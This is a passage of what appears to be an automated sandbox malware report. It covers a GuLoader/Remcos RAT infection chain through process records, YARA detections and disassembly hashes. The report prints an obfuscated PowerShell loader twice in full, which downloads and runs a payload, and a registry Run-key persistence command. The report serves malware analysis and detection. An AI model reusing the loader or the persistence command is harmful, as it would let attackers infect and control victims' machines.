gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:08:16:57
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:08:17:08
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
                                                              Imagebase:0xaa0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1994393544.00000000089E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1982397865.0000000005F76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1994713793.000000000927D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:08:17:08
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:08:17:29
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0x720000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:11
                                                              Start time:08:17:38
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                                                              Imagebase:0x240000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:08:17:38
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:08:17:38
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                                                              Imagebase:0xa60000
                                                              File size:59'392 bytes
                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FFD9A24A7EA Relevance: .5, Instructions: 544COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f16496b709e3ea856bc8f95bbe8860a3b408a9bcff4b0b47838afc8c310816f3
                                                                • Instruction ID: a490a97457478631954cbd1d38ec812e90461b782584378d844af8ab61e7170f
                                                                • Opcode Fuzzy Hash: f16496b709e3ea856bc8f95bbe8860a3b408a9bcff4b0b47838afc8c310816f3
                                                                • Instruction Fuzzy Hash: F1020763A0EBC60FE7AA9B6848A52647FE1EF57210F1901FED099CB1D3D9196C45C342
                                                                Function 00007FFD9A17B182 Relevance: .4, Instructions: 396COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26718790a8e2c7959da66a9eb9a27ee07969aadd6172821c5b8631ba8700827c
                                                                • Instruction ID: 22f9236325237d6015ebc70dad0bd46d4181df1af30eeff748b3cffa5d7c86e6
                                                                • Opcode Fuzzy Hash: 26718790a8e2c7959da66a9eb9a27ee07969aadd6172821c5b8631ba8700827c
                                                                • Instruction Fuzzy Hash: 18D16731A1CA4D4FEBA8DF28C8557E977D1FF68300F14426AD85EC7695CF34A9808B81
                                                                Function 00007FFD9A17BF32 Relevance: .4, Instructions: 379COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5e2de992a412b2040d593117b249130e3d3879f602b184c797230a76e75fafa
                                                                • Instruction ID: a16b3e5cf53900a57d4d5a6a838c29ae6975da25f1c2189101c20503731db479
                                                                • Opcode Fuzzy Hash: b5e2de992a412b2040d593117b249130e3d3879f602b184c797230a76e75fafa
                                                                • Instruction Fuzzy Hash: 7DD17331A18A4E8FEBA8DF28C8557F977D1FB68300F14827AD80DD7295DF7499808B81
                                                                Function 00007FFD9A17D555 Relevance: .7, Instructions: 692COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782254130.00007FFD9A170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A170000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a170000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e136818102f831bd0a43c4850f040451a370e31ee117e7c1937a9103a8401da4
                                                                • Instruction ID: 28af4c56127aa10d4caa7564c3f6a3c9dcff63c74fed90790a4fbc485e7c0639
                                                                • Opcode Fuzzy Hash: e136818102f831bd0a43c4850f040451a370e31ee117e7c1937a9103a8401da4
                                                                • Instruction Fuzzy Hash: 1032B431A18A4D8FDF98DF5CC4A5AA977E1FFA8310F1401AED449D7296CA35F881CB81
                                                                Function 00007FFD9A249228 Relevance: .7, Instructions: 691COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3456f7939a953232e43c9ca58e42b9db6ffec707b7bd51bfcbc472037c44f20
                                                                • Instruction ID: 00891d81196c8020cc3c48a9e3db3bb8ba216d8f00ea1473be97857db3859fc8
                                                                • Opcode Fuzzy Hash: d3456f7939a953232e43c9ca58e42b9db6ffec707b7bd51bfcbc472037c44f20
                                                                • Instruction Fuzzy Hash: 30220623A0DB860FE7AADB6848656A47BE1EF57210F1801FED09DC71D7DE19AC45C342
                                                                Function 00007FFD9A2472B5 Relevance: .6, Instructions: 556COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef682a469ec09e16a80e2452c0f87bcc0f9537a3e4fb00d0f032d2cf4941acbe
                                                                • Instruction ID: d47171b970d56d4c3f09cbfc728ee51ce8c6dd3e42cd843d033774e107a618e3
                                                                • Opcode Fuzzy Hash: ef682a469ec09e16a80e2452c0f87bcc0f9537a3e4fb00d0f032d2cf4941acbe
                                                                • Instruction Fuzzy Hash: FCF13733B0DA8B4FE7B9876858651B47BE2EF97224B1811FAD46DC71D3DE18AC068341
                                                                Function 00007FFD9A24A050 Relevance: .5, Instructions: 488COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a786d81e98bf9e17a0cf3d451e23b39269061470310abc4f3801127f8d5acd58
                                                                • Instruction ID: c7caa302d95cfd7cfa97860f72220488c0c72ac825599010d120b13db20a0ad1
                                                                • Opcode Fuzzy Hash: a786d81e98bf9e17a0cf3d451e23b39269061470310abc4f3801127f8d5acd58
                                                                • Instruction Fuzzy Hash: 9CF11523E0DB860FE7A9DB6848A56A87BE1EF56210F1811FED05CCB1C7DE19AC45D342
                                                                Function 00007FFD9A249B64 Relevance: .4, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 501dc67bcb615ce2bfe47b679d1b8c8a37ff1a3ddc9f85d349c0e81d9fce9eb1
                                                                • Instruction ID: 5ec619a57b45e56206892a6cb3c82bb51572a8a9b0f6f638d426749f4ded79f8
                                                                • Opcode Fuzzy Hash: 501dc67bcb615ce2bfe47b679d1b8c8a37ff1a3ddc9f85d349c0e81d9fce9eb1
                                                                • Instruction Fuzzy Hash: 04D12823B0DA8A4FE7AADAA948A46B47BE1EF56310B0801FFD05DCB1D7D919AC45C341
                                                                Function 00007FFD9A249410 Relevance: .4, Instructions: 417COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f52e9c8285c2ebb07ecdd579099d25e229f05b7372e0fb8b0761ef4df2563cce
                                                                • Instruction ID: 09ad6c1f4f8c68bec1e8455b389a6bca9a27cffa789cb239209991c2ddfe95d3
                                                                • Opcode Fuzzy Hash: f52e9c8285c2ebb07ecdd579099d25e229f05b7372e0fb8b0761ef4df2563cce
                                                                • Instruction Fuzzy Hash: 5ED10763E0EB860FE7A9DB6848656787BE1EF56210F1801FED09C871D7DE19AC45C342
                                                                Function 00007FFD9A2446C9 Relevance: .4, Instructions: 367COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.1782648546.00007FFD9A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A240000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_7ffd9a240000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5620b44c2eb41b982019d9d866e55538f327a24c6619a9902892a2c1ffd5403a
                                                                • Instruction ID: 31b9f2590b97bf3a0ef311238740c59b1806fc2675d9b673ebf316aefa1cdd65
                                                                • Opcode Fuzzy Hash: 5620b44c2eb41b982019d9d866e55538f327a24c6619a9902892a2c1ffd5403a
                                                                • Instruction Fuzzy Hash: FDA12573B0DA8B0FE7AD9AA85C615B537D1EF97220B4811FEE05DC70D7ED19AC029242
                                                                Function 00007FFD9A245678 Relevance: .4, Instructions: 359COMMON
